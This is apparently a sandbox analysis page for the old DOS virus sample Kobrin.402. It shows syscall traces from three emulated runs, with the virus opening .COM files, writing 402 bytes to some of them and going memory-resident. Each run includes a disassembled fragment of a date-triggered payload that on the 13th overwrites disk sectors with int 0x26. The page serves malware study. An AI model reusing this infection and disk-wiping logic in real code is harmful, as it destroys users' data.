Sample viewer

vx.netlux.org/Virus.DOS.BrPI.Kobrin.402


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:52.862002509Z 42 PC: 12a48 | Get date
0x12a48: cmp dl, 0xd
0x12a4b: jne 0x12a81
0x12a4d: push bp
0x12a4e: mov cx, 0x1d
0x12a51: mov si, 0x22a
0x12a54: call 0x12b9f
0x12a57: xor al, al
0x12a59: push ax
0x12a5a: mov cx, 0x28
0x12a5d: xor bx, bx
0x12a5f: xor dx, dx
0x12a61: int 0x26
0x12a63: pop ax
0x12a64: jb 0x12a71
0x12a66: mov cx, 0x1d
0x12a69: mov dx, 0x22a
0x12a6c: inc bx
0x12a6d: mov ah, 0x40
0x12a6f: int 0x21
0x12a71: pop ax
2018-12-17T22:51:52.864296941Z 26 PC: 12a88 | Set disk transfer address
2018-12-17T22:51:52.86514319Z 37 PC: 12a90 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:51:52.865945227Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.867434576Z 78 PC: 12aa9 | Find first file
2018-12-17T22:51:52.871109128Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.88394865Z 61 PC: 12ae7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:52.888191915Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:52.892153338Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:51:52.893055019Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:52.894398782Z 62 PC: 12b54 | Close file
2018-12-17T22:51:52.898773582Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:52.906351907Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:52.908970233Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.916799509Z 61 PC: 12ae7 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:51:52.923992286Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:52.92850603Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:51:52.929911606Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:52.931285373Z 62 PC: 12b54 | Close file
2018-12-17T22:51:52.939121061Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:52.947100993Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:52.949580653Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.959478293Z 61 PC: 12ae7 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:51:52.966181881Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:52.972807512Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:51:52.974979951Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:52.976469768Z 62 PC: 12b54 | Close file
2018-12-17T22:51:52.985903894Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:52.995969958Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:52.998582458Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.008089917Z 61 PC: 12ae7 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:51:53.015278889Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.021636642Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.022959439Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.025741016Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.027872972Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.03528671Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.048073497Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.052537686Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.062205899Z 61 PC: 12ae7 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:51:53.06888777Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.075990784Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.077325695Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.07980055Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.081841388Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.088591765Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.0980544Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.100899673Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.110423064Z 61 PC: 12ae7 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:51:53.117509011Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.124389263Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.125684254Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.12811897Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.130294926Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.137204886Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.14662265Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.149834791Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.15930038Z 61 PC: 12ae7 | Open file (Filename = 'PAH.COM')
2018-12-17T22:51:53.165704456Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.17234494Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.173727054Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.177161301Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.178968239Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.186133826Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.195741654Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.198738765Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.208338261Z 61 PC: 12ae7 | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:53.214872972Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.221739896Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.223168Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.230188326Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.243024052Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.245346943Z 26 PC: 12abc | Set disk transfer address
2018-12-17T22:51:53.246376457Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:51:53.247970241Z 48 PC: 15d44 | Get DOS version
2018-12-17T22:51:53.249026864Z 9 PC: 15d58 | Display string (Could not find end pointer)
2018-12-17T22:51:53.269046113Z 53 PC: 15dfe | Get interrupt vector (Interrupt = '51' AKA 'Get or set Ctrl-Break')
2018-12-17T22:51:53.271059551Z 53 PC: 15e0b | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:51:53.272223319Z 53 PC: 15e20 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:51:53.27445584Z 53 PC: 15e32 | Get interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-17T22:51:53.276165515Z 53 PC: 15e3f | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-17T22:51:53.277234592Z 53 PC: 15e54 | Get interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-17T22:51:53.282653696Z 37 PC: 1c61e | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:51:53.284576076Z 37 PC: 1c62c | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:51:53.285856168Z 37 PC: 1c63a | Set interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-17T22:51:53.287060182Z 37 PC: 12f51 | Set interrupt vector (Interrupt = '68' AKA 'I/O control for devices')
2018-12-17T22:51:53.289278898Z 37 PC: 12f76 | Set interrupt vector (Interrupt = '31' AKA 'Get disk parameter block for default drive')
2018-12-17T22:51:53.293317655Z 73 PC: 15596 | Release memory
2018-12-17T22:51:53.294934699Z 49 PC: 15599 | Terminate and stay resident (Return code = '0' | Memory size = '708')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10700,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:14.596782717Z 42 PC: 12a48 | Get date
0x12a48: cmp dl, 0xd
0x12a4b: jne 0x12a81
0x12a4d: push bp
0x12a4e: mov cx, 0x1d
0x12a51: mov si, 0x22a
0x12a54: call 0x12b9f
0x12a57: xor al, al
0x12a59: push ax
0x12a5a: mov cx, 0x28
0x12a5d: xor bx, bx
0x12a5f: xor dx, dx
0x12a61: int 0x26
0x12a63: pop ax
0x12a64: jb 0x12a71
0x12a66: mov cx, 0x1d
0x12a69: mov dx, 0x22a
0x12a6c: inc bx
0x12a6d: mov ah, 0x40
0x12a6f: int 0x21
0x12a71: pop ax
2018-12-25T13:07:14.599523582Z 26 PC: 12a88 | Set disk transfer address
2018-12-25T13:07:14.600538292Z 37 PC: 12a90 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:07:14.601595521Z 67 PC: 12adf | Get or set file attributes
2018-12-25T13:07:14.604066778Z 78 PC: 12aa9 | Find first file
2018-12-25T13:07:14.609712109Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.625788943Z 61 PC: 12ae7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:07:14.632602799Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-25T13:07:14.639146518Z 66 PC: 12b17 | Move file pointer
2018-12-25T13:07:14.640733773Z 87 PC: 12b50 | Get or set file date and time
2018-12-25T13:07:14.642765912Z 62 PC: 12b54 | Close file
2018-12-25T13:07:14.648786415Z 67 PC: 12b62 | Get or set file attributes
2018-12-25T13:07:14.660711809Z 79 PC: 12b69 | Find next file
2018-12-25T13:07:14.663760996Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.674130293Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.680441505Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.686696454Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.687980232Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.689580682Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.698044977Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.707712851Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.710327708Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.723612717Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.730811515Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.737280852Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.739552298Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.741043773Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.748100237Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.758874725Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.767585176Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.777269101Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.786297739Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.793321634Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.794641707Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.79609939Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.803514416Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.813060205Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.815574512Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.825949763Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.832333942Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.838586645Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.840693454Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.842204179Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.851933023Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.862375882Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.865242874Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.87507997Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.882304995Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.886996708Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.888599357Z 64 PC: 12b2e | Write file or device (Write 402 bytes on handle 5)
2018-12-25T13:07:14.89763255Z 66 PC: 12b39 | Move file pointer
2018-12-25T13:07:14.899340041Z 64 PC: 12b43 | Write file or device (Write 402 bytes on handle 5)
2018-12-25T13:07:14.906083133Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.909017034Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.917287578Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.927175665Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.930905624Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.942736419Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.949635729Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.956584917Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.957962595Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.959612834Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.967363134Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.980294881Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.982906255Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.993259681Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:15.000430838Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:15.007359403Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:15.010460926Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:15.017727096Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:15.027999794Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:15.030998715Z 26 PC: 12abc | Set disk transfer address
2018-12-25T13:07:15.032132954Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:07:15.033379782Z 48 PC: 15d44 | Get DOS version
2018-12-25T13:07:15.035277266Z 9 PC: 15d58 | Display string (Could not find end pointer)
2018-12-25T13:07:15.051034915Z 53 PC: 15dfe | Get interrupt vector (Interrupt = '51' AKA 'Get or set Ctrl-Break')
2018-12-25T13:07:15.052162343Z 53 PC: 15e0b | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T13:07:15.054244399Z 53 PC: 15e20 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T13:07:15.056473254Z 53 PC: 15e32 | Get interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-25T13:07:15.057596333Z 53 PC: 15e3f | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T13:07:15.059359296Z 53 PC: 15e54 | Get interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-25T13:07:15.063836187Z 37 PC: 1c61e | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T13:07:15.065195673Z 37 PC: 1c62c | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T13:07:15.067080347Z 37 PC: 1c63a | Set interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-25T13:07:15.068640503Z 37 PC: 12f51 | Set interrupt vector (Interrupt = '68' AKA 'I/O control for devices')
2018-12-25T13:07:15.070438001Z 37 PC: 12f76 | Set interrupt vector (Interrupt = '31' AKA 'Get disk parameter block for default drive')
2018-12-25T13:07:15.074645598Z 73 PC: 15596 | Release memory
2018-12-25T13:07:15.07599156Z 49 PC: 15599 | Terminate and stay resident (Return code = '0' | Memory size = '708')

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10700,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:54.557245128Z 42 PC: 12a48 | Get date
0x12a48: cmp dl, 0xd
0x12a4b: jne 0x12a81
0x12a4d: push bp
0x12a4e: mov cx, 0x1d
0x12a51: mov si, 0x22a
0x12a54: call 0x12b9f
0x12a57: xor al, al
0x12a59: push ax
0x12a5a: mov cx, 0x28
0x12a5d: xor bx, bx
0x12a5f: xor dx, dx
0x12a61: int 0x26
0x12a63: pop ax
0x12a64: jb 0x12a71
0x12a66: mov cx, 0x1d
0x12a69: mov dx, 0x22a
0x12a6c: inc bx
0x12a6d: mov ah, 0x40
0x12a6f: int 0x21
0x12a71: pop ax
2018-12-25T12:28:54.69004885Z 64 PC: 12a71 | Write file or device (Write 29 bytes on handle 1)